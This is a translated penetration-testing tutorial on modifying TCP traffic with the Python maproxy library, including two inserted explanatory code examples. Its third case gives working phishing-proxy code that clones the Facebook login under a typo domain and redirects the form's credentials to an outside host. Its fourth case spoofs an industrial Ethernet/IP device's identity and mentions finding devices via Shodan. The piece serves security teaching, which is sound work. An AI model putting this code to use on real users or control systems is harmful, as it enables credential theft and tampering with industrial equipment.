Modifying network data on the fly

The translation of this article was prepared on the eve of the start of the course "Pentest. Penetration testing practice".


Introduction

Various kinds of security assessment, from routine penetration tests and Red Team operations to hacking IoT/ICS and SCADA devices, involve working with binary network protocols, that is, intercepting and modifying the network data exchanged between a client and the target. Sniffing network traffic is not a hard task, since we have tools such as Wireshark, Tcpdump or Scapy, but modification looks like a much harder one, because we need some kind of interface to read the network data, filter it, modify it on the fly and send it on to the target host in near real time. In addition, it would be good if such a tool could handle several parallel connections and could be configured with scripts.

One day I came across a tool called maproxy, and its documentation quickly made clear that maproxy was exactly what I had been missing. It is a simple, versatile and easily configurable TCP proxy. I tested this tool against several demanding applications, including ICS devices (which generate a lot of packets), to see whether it could cope with many parallel connections, and it performed well.

This article shows how to modify network data on the fly using maproxy.

Overview

maproxy is built on Tornado, a popular and mature asynchronous networking framework for Python.

In general, it can operate in several modes:

  • TCP:TCP - plain TCP connection;
  • TCP:SSL and SSL:TCP - encryption on one side only;
  • SSL:SSL - encryption on both sides.

It is shipped as a library. For a quick start, you can use the example files that demonstrate the main features of the library:

  • all.py
  • certificate.pem
  • logging_proxy.py
  • privatekey.pem
  • ssl2ssl.py
  • ssl2tcp.py
  • tcp2ssl.py
  • tcp2tcp.py

Case 1 - simple forwarding proxy

Based on tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

# every connection accepted on local port 2222 is forwarded to localhost:22
server = maproxy.proxyserver.ProxyServer("localhost", 22)
server.listen(2222)
# hand control to Tornado's event loop; the proxy runs until interrupted
tornado.ioloop.IOLoop.instance().start()

The ProxyServer() constructor takes two arguments: the target host and the target port. server.listen() takes a single argument: the port on which to listen for incoming connections.

Run the script:

# python tcp2tcp.py

For a test, we connect to the local SSH server through the proxy script, which listens on port 2222/tcp and connects to the SSH server's standard port 22/tcp:


The welcome banner shows that our example script has successfully proxied the network traffic.

Case 2 - data modification

Another demo script, logging_proxy.py, is well suited to working with network data. The comments in the file describe the class methods you can override to achieve your goal:


The most interesting ones are:

  • on_c2p_done_read - intercepts data on its way from the client to the server;
  • on_p2s_done_read - the same for the opposite direction.

Let's try to modify the SSH banner that the server returns to the client:

[…]
    def on_p2s_done_read(self, data):
        # server -> client direction: rewrite the SSH banner before forwarding it
        # (data is bytes, so the patterns must be bytes too)
        data = data.replace(b"OpenSSH", b"DumnySSH")
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
# session_factory is what makes the proxy use LoggingSession (and its overrides) at all
server = maproxy.proxyserver.ProxyServer("localhost", 22, session_factory=LoggingSessionFactory())
server.listen(2222)
[…]

Run the script:


As you can see, the client was misled, because the SSH server name was changed to «DumnySSH».

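A caveat on the banner rewrite above, with an added example that is not the article's code and not part of maproxy: on_p2s_done_read() receives whatever a single socket read returned, so a pattern such as "OpenSSH" can be split across two reads, and a per-chunk data.replace() then silently misses it. The StreamRewriter below holds back only the bytes that could still become a match; the hook names in the trailing comment are the article's, but the way it is wired into LoggingSession is assumed.

```python
class StreamRewriter:
    """Replace `old` with `new` in a byte stream that arrives in arbitrary chunks."""

    def __init__(self, old: bytes, new: bytes) -> None:
        if not old:
            raise ValueError("pattern must not be empty")
        self.old, self.new = old, new
        self.pending = b""  # unmatched tail that may still grow into `old`

    def feed(self, chunk: bytes) -> bytes:
        """Return the rewritten bytes that are safe to forward right now."""
        buf = self.pending + chunk
        out = bytearray()
        i = 0
        # Same left-to-right, non-overlapping scan that bytes.replace() performs.
        while (j := buf.find(self.old, i)) >= 0:
            out += buf[i:j] + self.new
            i = j + len(self.old)
        rem = buf[i:]  # contains no complete occurrence of `old`
        # Hold back the longest suffix of `rem` that is a proper prefix of `old`;
        # only those bytes can still become part of a match with the next chunk.
        keep = 0
        for n in range(min(len(self.old) - 1, len(rem)), 0, -1):
            if self.old.startswith(rem[-n:]):
                keep = n
                break
        self.pending = rem[len(rem) - keep:]
        out += rem[:len(rem) - keep]
        return bytes(out)

    def flush(self) -> bytes:
        """Emit whatever was held back; call when the connection closes."""
        out, self.pending = self.pending, b""
        return out


def rewrite_chunks(chunks, old: bytes, new: bytes) -> bytes:
    """Push a whole sequence of socket reads through one rewriter."""
    rw = StreamRewriter(old, new)
    return b"".join(rw.feed(c) for c in chunks) + rw.flush()


# Constructed sample: the banner split by two reads exactly inside "OpenSSH".
CHUNKS = [b"SSH-2.0-Open", b"SSH_7.9p1 Debian-10\r\n"]
NAIVE = b"".join(c.replace(b"OpenSSH", b"DumnySSH") for c in CHUNKS)  # misses it
FIXED = rewrite_chunks(CHUNKS, b"OpenSSH", b"DumnySSH")

# Hypothetical wiring into the article's LoggingSession (maproxy not imported here):
#   when the session is created:  self.s2c = StreamRewriter(b"OpenSSH", b"DumnySSH")
#   in on_p2s_done_read(data):    data = self.s2c.feed(data)
```

Held-back bytes are delayed until the next read arrives, so for a line-oriented protocol it is reasonable to call flush() at the end of each line.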

Case 3 - simple phishing page

There are countless ways to use this tool. This time let's look at something more useful from the Red Team's point of view. Let's imitate the m.facebook.com login page and use a deliberately misspelled domain, for example m.facebok.com. For demonstration purposes, let's assume the domain is registered to us.

We set up an unencrypted connection from the victim hosts to our proxy and an SSL stream from the proxy to the Facebook server (31.13.81.36). For this example to work, we need to change the HTTP Host header to the correct name, and we also disable response compression so that the content is easy to work with. Finally, we modify the HTML form so that the login credentials are sent to us instead of Facebook's servers:

[…]
    def on_c2p_done_read(self, data):
        # replace Host header
        data = data.replace(b"Host: m.facebok.com", b"Host: m.facebook.com")
        # disable compression
        data = data.replace(b"gzip", b"identity;q=0")
        data = data.replace(b"deflate", b"")
        super(LoggingSession, self).on_c2p_done_read(data)
[…]
    def on_p2s_done_read(self, data):
        # partial replacement of response
        data = data.replace(b'action="/ny/login/', b'action="https://redteam.pl/')
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
# plain TCP on port 80 towards the clients, SSL towards the target (server_ssl_options=True)
server = maproxy.proxyserver.ProxyServer("31.13.81.36", 443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

The result:


As you can see, we managed to modify the original site.

Case 4 - Ethernet/IP

I have been working with industrial equipment and software (ICS/SCADA) for a long time: programmable logic controllers (PLCs), I/O modules, drives, relays, programming workstations and much more. This case is for those who like industrial things. Hacking such solutions involves a lot of playing with network protocols. In the following example I want to show how to modify ICS/SCADA network traffic.

For this you will need the following:

  • a network sniffer, for example Wireshark;
  • an Ethernet/IP or CIP device, which can be found using the Shodan service;
  • our script based on maproxy.

First, let's see what device identification over CIP (Common Industrial Protocol) looks like:


Device identification is done over the Ethernet/IP protocol, an adaptation of Ethernet for industrial use that encapsulates protocols such as CIP. We will change the identity name seen in the capture, "NI-IndComm for Ethernet", using our proxy script. Again we can use the logging_proxy.py script and modify the on_p2s_done_read method of the class in the same way, since we want a different name to appear on the client side.

Code:

[…]
    def on_p2s_done_read(self, data):
        # partial replacement of response

        # Checking if we got a List Identity message response:
        # bytes 26:28 hold the item type, 0x000C = CIP Identity item
        if data[26:28] == b'\x0c\x00':
            print('Got response, replacing')
            # the product name starts at byte 63; overwrite exactly 10 bytes of it so
            # that the packet's length fields stay valid
            data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
# 44818/tcp is the Ethernet/IP encapsulation port; we listen on the same port
server = maproxy.proxyserver.ProxyServer("1.3.3.7", 44818, session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

In fact, we requested the device identification twice: the second response is the original one, and the first was modified on the fly.
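An added example, not from the article and not part of maproxy: a decoder for the Ethernet/IP List Identity reply that case 4 patches, written from the published encapsulation layout (little-endian encapsulation header, big-endian socket address). It explains the two magic offsets in the snippet (bytes 26:28 hold the CIP Identity item type 0x000C, the product name starts at byte 63) and shows why the overwrite has to be length-preserving. The reply is constructed here with arbitrary sample IDs; nothing comes from a real device.

```python
import struct

LIST_IDENTITY_CMD = 0x0063   # Ethernet/IP encapsulation command
IDENTITY_ITEM = 0x000C       # CIP Identity item type carried in the reply
NAME_OFFSET = 63             # first byte of the product name (see the article)


def build_list_identity(product_name: bytes, vendor=0x1234, dev_type=0x000C,
                        product_code=0x0001, serial=0x31337) -> bytes:
    """Construct one ListIdentity reply with a single CIP Identity item (sample IDs)."""
    # socket address is big-endian: family, port, IPv4, 8 zero bytes
    sockaddr = struct.pack(">HH4s8s", 2, 44818, bytes([192, 0, 2, 10]), b"")
    item = struct.pack("<H", 1) + sockaddr  # encapsulation protocol version + address
    item += struct.pack("<HHHBBHI", vendor, dev_type, product_code, 1, 0, 0x0030, serial)
    item += bytes([len(product_name)]) + product_name + b"\x03"  # name length, name, state
    body = struct.pack("<HHH", 1, IDENTITY_ITEM, len(item)) + item  # item count, type, length
    header = struct.pack("<HHII8sI", LIST_IDENTITY_CMD, len(body), 0, 0, b"", 0)
    return header + body


def parse_list_identity(data: bytes) -> dict:
    """Decode the reply and check that every length field agrees with the bytes."""
    cmd, length, _session, _status, _ctx, _opts = struct.unpack_from("<HHII8sI", data, 0)
    if cmd != LIST_IDENTITY_CMD or length != len(data) - 24:
        raise ValueError("not a well-formed ListIdentity reply")
    count, item_type, item_len = struct.unpack_from("<HHH", data, 24)
    if count != 1 or item_type != IDENTITY_ITEM or item_len != len(data) - 30:
        raise ValueError("unexpected encapsulated item")
    vendor, dev_type, code, rev_major, rev_minor, dev_status, serial = \
        struct.unpack_from("<HHHBBHI", data, 48)
    name_len = data[62]
    name = data[NAME_OFFSET:NAME_OFFSET + name_len]
    if len(name) != name_len or len(data) != NAME_OFFSET + name_len + 1:
        raise ValueError("product name length does not match packet size")
    return {"vendor": vendor, "device_type": dev_type, "product_code": code,
            "revision": f"{rev_major}.{rev_minor}", "status": dev_status,
            "serial": serial, "product_name": name.decode("ascii", "replace"),
            "state": data[-1]}


def article_patch(data: bytes, new_name: bytes = b"DUMMY31337") -> bytes:
    """The fixed-offset overwrite from case 4: only valid when new_name is exactly as
    long as the 10 bytes it replaces, otherwise the length fields no longer match."""
    return data[:NAME_OFFSET] + new_name + data[NAME_OFFSET + 10:]
```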

Conclusion

In my opinion maproxy is a simple and convenient tool, and it is written in Python, so I hope you too will find it useful. Of course, there are far more sophisticated tools for working with and modifying network data, but they also demand much more attention and are usually built for specific use cases, for example Muraena, Modlishka or evilginx for cases like the third one, or canape for the last one. One way or another, with maproxy you can quickly implement your own ideas for modifying network data, since the example scripts are easy to understand.


Source: www.habr.com
